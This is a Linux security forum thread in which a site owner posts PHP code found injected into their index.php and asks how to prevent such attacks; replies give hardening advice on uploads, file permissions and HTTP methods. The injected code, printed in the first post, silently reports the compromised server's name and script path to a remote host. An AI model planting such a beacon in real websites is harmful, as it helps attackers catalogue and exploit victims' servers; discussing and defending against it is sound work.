LinuxQuestions.org
Help answer threads with 0 replies.
Go Back   LinuxQuestions.org > Forums > Linux Forums > Linux - Security
User Name
Password
Linux - Security This forum is for all security related questions.
Questions, tips, system compromises, firewalls, etc. are all included here.

Notices

Reply
 
Search this Thread
Old 10-13-2013, 12:01 PM   #1
centeralweb
LQ Newbie
 
Registered: Apr 2013
Posts: 7

Rep: Reputation: Disabled
Exclamation How to prevent XSS?


Hi dears.
We designed a new website with PHP 5.x and hosted by Linux CentOS 6.x.
Today we saw that this code was added to first of the index.php file. How we can prevent from these attacks?

Code:
<?php
error_reporting(0);
$filename="201d83e5190240d5dabdd3e5884ae99f";
$task_id="11359";
if(!file_exists($filename)&&function_exists("parse_url")&&function_exists("socket_create")&&function_exists("socket_connect")&&function_exists("base64_encode")&&function_exists("socket_write")&&function_exists("socket_close")){
$target="http://somewebsite/path/file.php";
$target_url=parse_url($target);
$target_host=$target_url["host"];
if(!($target_port=$target_url["port"])) $target_port=80;
$target_path=$target_url["path"];
$fp=socket_create(AF_INET,SOCK_STREAM,SOL_TCP);
socket_connect($fp,$target_host,$target_port);
$get_parameters=base64_encode("$task_id\t$filename\t".$_SERVER["SERVER_NAME"]."\t".$_SERVER["SCRIPT_NAME"]."\n");
$request="GET $target_path?$get_parameters HTTP/1.0\r\n";
$request.="Host: $target_host\r\n";
$request.="\r\n";
$sent=socket_write($fp,$request,strlen($request));
if($sent==strlen($request)){
$f = @fopen($filename, "w");
fclose($f);
}
socket_close($fp);
}
?>
Best regards

Last edited by unSpawn; 10-16-2013 at 01:36 AM. Reason: //Obfuscate remote site and path, replace PHP with vBB CODE tags
 
Old 10-13-2013, 01:00 PM   #2
Robhogg
Member
 
Registered: Sep 2004
Location: Old York, North Yorks.
Distribution: Debian 7 (mainly)
Posts: 653

Rep: Reputation: 85
Hi,

This isn't XSS as I normally understand it (entering JavaScript code into website forms). Firstly, are you sure that one of your developers didn't insert this? It looks like an attempt at home-baked analytics, and McAfee's siteadvisor.com doesn't raise any concerns about mattsmarketingblog.com.

If this has been inserted by an attacker, there are a few things you can do to improve security. The main ones that come to mind are:
  • Sanitise file uploads (if your site allows them) - users should never be able to choose filename or save path for files on the server.
  • Make sure your code directories are not writable by the web server user (apache?).
  • Consider adding a <Limit...> or <LimitExcept...> directive to prevent HTTP methods such as PUT and DELETE
 
Old 10-13-2013, 01:19 PM   #3
centeralweb
LQ Newbie
 
Registered: Apr 2013
Posts: 7

Original Poster
Rep: Reputation: Disabled
Hi Robhogg.

Thank you for your answering. I'm sure that this is an attack because we wrote this file and when we compared the file that is located on the server with the source file on our PC, there was this difference.
Can you please explain more about you 1st and 3rd solution?

Thanks a lot
 
Old 10-13-2013, 03:22 PM   #4
Robhogg
Member
 
Registered: Sep 2004
Location: Old York, North Yorks.
Distribution: Debian 7 (mainly)
Posts: 653

Rep: Reputation: 85
1. The file will be uploaded to a temporary location, and this location will be passed in $_FILES['name_in_form']['tmp_name'] (generally something like "/tmp/phpOqF3Xs"), and the name on the user's system will be passed as $_FILES['name_in_form']['name']. What I was suggesting is that you should be cautious about storing the file on the server using the original name - instead, your script should select the path and filename (and store the original name in a database if it needs to be retained). This would negate any attempts by the user to overwrite a file already on the system (even if permissions allowed this).

3. Some HTTP actions are intended to change data on the server. In particular, the PUT method requests the server to store a document at a particular URL (and DELETE does what it sounds like). By adding a <Limit...> directive in the <Directory...> section(s) of your Apache config, your can lock this down.

Another point is that it's best to get PHP to check the type of any uploaded files (using the mime_content_type() function), to protect against an attacker managing to spoof the type sent to the server.
 
Old 10-13-2013, 03:28 PM   #5
centeralweb
LQ Newbie
 
Registered: Apr 2013
Posts: 7

Original Poster
Rep: Reputation: Disabled
Thanks a lot.
So what type of files can be dangerous and should be filtered.

Best regards
 
Old 10-13-2013, 04:03 PM   #6
Robhogg
Member
 
Registered: Sep 2004
Location: Old York, North Yorks.
Distribution: Debian 7 (mainly)
Posts: 653

Rep: Reputation: 85
Pretty much, executable files.

The question is, what types of files do your users need to be able to upload? The more limited, the better. If a site I was managing did need to allow users to upload executable files, then I'd want to spend some time investigating the risks and measures needed to protect against them (including making sure the upload directory is not directly accessible from the web, that PHP scripts cannot run from there, that files do not have the execute bit set, etc., etc.).

Last edited by Robhogg; 10-13-2013 at 04:08 PM.
 
Old 10-14-2013, 09:50 AM   #7
sundialsvcs
Guru
 
Registered: Feb 2004
Location: SE Tennessee, USA
Distribution: Gentoo, LFS
Posts: 5,377

Rep: Reputation: 1108Reputation: 1108Reputation: 1108Reputation: 1108Reputation: 1108Reputation: 1108Reputation: 1108Reputation: 1108Reputation: 1108
If someone added code to your index.php file, then they either gained access to your system, or jimmied the system that allows you to update those files remotely (which by the way should never exist).

Your system has been compromised and ultimately it will have to be reinstalled.
 
Old 10-14-2013, 11:40 AM   #8
centeralweb
LQ Newbie
 
Registered: Apr 2013
Posts: 7

Original Poster
Rep: Reputation: Disabled
Thank you sundialsvcs, but it's a shared hosting and a think that there is some other solutions to solving this issue. (For example, antivirus or antispyware softwares).


Best regards
 
Old 10-16-2013, 01:39 AM   #9
unSpawn
Moderator
 
Registered: May 2001
Posts: 27,300
Blog Entries: 54

Rep: Reputation: 2855Reputation: 2855Reputation: 2855Reputation: 2855Reputation: 2855Reputation: 2855Reputation: 2855Reputation: 2855Reputation: 2855Reputation: 2855Reputation: 2855
Quote:
Originally Posted by sundialsvcs View Post
Your system has been compromised and
There are a few ways how a file could have gotten there so until it's been proven compromised I'd appreciate it if you would not put it that way, if you understand what I'm saying...


Quote:
Originally Posted by centeralweb View Post
(..) it's a shared hosting and a think that there is some other solutions to solving this issue.
Shared hosts share (in)security so it would be best if you would thoroughly investigate the matter and report back any findings.
 
  


Reply


Thread Tools Search this Thread
Search this Thread:

Advanced Search

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is Off
HTML code is Off


Similar Threads
Thread Thread Starter Forum Replies Last Post
[SOLVED] XSS error - How to fix? Sebi94 Linux - Server 2 05-31-2013 05:18 PM
Stop XSS? jmslee123 Linux - Networking 1 06-16-2010 06:54 AM
LXer: Security gone awry: IE 8 XSS filter exposes sites to XSS attack LXer Syndicated Linux News 0 04-20-2010 06:42 AM
xss checkin rubadub Programming 2 04-28-2008 04:16 PM
Apache XSS prevention abhijeetudas Linux - Security 5 03-22-2005 03:37 PM


All times are GMT -5. The time now is 11:12 AM.

Main Menu
My LQ
Write for LQ
LinuxQuestions.org is looking for people interested in writing Editorials, Articles, Reviews, and more. If you'd like to contribute content, let us know.
Main Menu
Syndicate
RSS1  Latest Threads
RSS1  LQ News
Twitter: @linuxquestions
identi.ca: @linuxquestions
Facebook: linuxquestions Google+: linuxquestions
Open Source Consulting | Domain Registration